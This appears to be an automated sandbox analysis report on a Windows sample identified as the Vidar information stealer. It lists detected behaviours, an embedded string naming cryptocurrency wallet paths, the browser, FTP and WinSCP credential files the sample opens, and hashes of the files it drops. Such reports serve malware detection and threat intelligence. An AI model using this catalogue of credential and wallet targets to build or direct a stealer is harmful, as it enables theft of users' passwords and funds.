Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.3ec5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ec5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C930C40 sqlite3_bind_zeroblob,	3_2_6C930C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C930D60 sqlite3_bind_parameter_name,	3_2_6C930D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C858EA0 sqlite3_clear_bindings,	3_2_6C858EA0

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1417473
Product:	CloudBasic
Start time:	12:07:05
Start date:	29.03.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0ce3dc374e49433d7e15d02c015e0ee3
SHA1:	71882bb02d1fa7b4a0f824afdcc1cd53bdb85ba1
SHA256:	f714adc256ed7b0d48a50c9b10d0db1d6285541801e720569c86fceeba072697
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\BKKJKFBKKECFHJKEBKEHIDAEBK	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\CAAKKFHC	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\CAAKKFHCFIECAAAKEGCF	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\ECFHIJKJ	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\ProgramData\EGIDAAFI	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4	6A6BAD38068B0F6F2CADC6464C4FE8F0	4E3B235898D8E900548613DDB6EA59CDA5EB4E68	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
C:\ProgramData\GCBGCAFI	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2	A2D1F4CF66465F9F0CAC61C4A95C7EDE	BA6A845E247B221AAEC96C4213E1FD3744B10A27	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
C:\ProgramData\GHDHDBAECGCAFHJJDAKF	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\HDAKJDHIEBFIIDGDGDBAEGCGDA	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\IIJDBGDGCGDAKFIDGIDBFIEHDH	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	C0FDF21AE11A6D1FA1201D502614B622	11724034A1CC915B061316A96E79E9DA6A00ADE8	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_c5ac9ded19774e294e4b23df51992ee9addb81_c9e05f82_07d774b4-4f7f-424b-b977-909ace4dfb05\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	0F5BEEB1C5B0E46E11810B12F6A3FD40	E4E01160528A8D544B0371C07C21C0D133AE04BA	1ED7B1E36C702E71E7C386CE8C82E4E265329C72F14E54CE4EC90544ADC7F2A3
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD260.tmp.dmp	Mini DuMP crash report, 15 streams, Fri Mar 29 11:07:50 2024, 0x1205a4 type	3EA1B5B50FA4D8D06095DB0E7401D811	8BD82C92DFCAC5D04825D14631EDC8BAF2C5732E	F4438F9A3BE0E1D0F0C267F0AC8175092A1D704F9319D1A0EF38E0BF09DCE87B
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD3B9.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	EC6BE54A124EAC8A08055E6B28C4A3A6	4473AA342B7CA1AC63A0D020F4F7C46A751061E3	131D5D069B0215024A0952AA47841DC47335AA1DE71DFA761BC14E72874D6049
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD3D9.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	30B77BC9DEA1972DA118C47A1FAB24AD	5E26B2249339EEF0DFEE21C02FA0C2AB58A1D285	AC97B7F338D322BEB3D0E631B58EAF5C9DFD2FB8E74325F72B5D81F95DC956A4
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199658817715[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators	D25D44AB2D13AE88822D45370840E5A2	376A02C2D691E30D4E96ACDE2EE74FAF513B596B	317411B030272E60C4A2215E8514DA91C2C345EA02F734B2C356EF1370E52CB8
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	90E744829865D57082A7F452EDC90DE5	833B178775F39675FA4E55EAB1032353514E1052	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	8D570A923DD96A051D3598FF904E8D13	4E1C7540C459185CDAE1944D7905CF62B8989F57	22261F2A69885FE97DB1AA51984AB9E0399139AAB255045BCA9CA18B1737BEE5

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by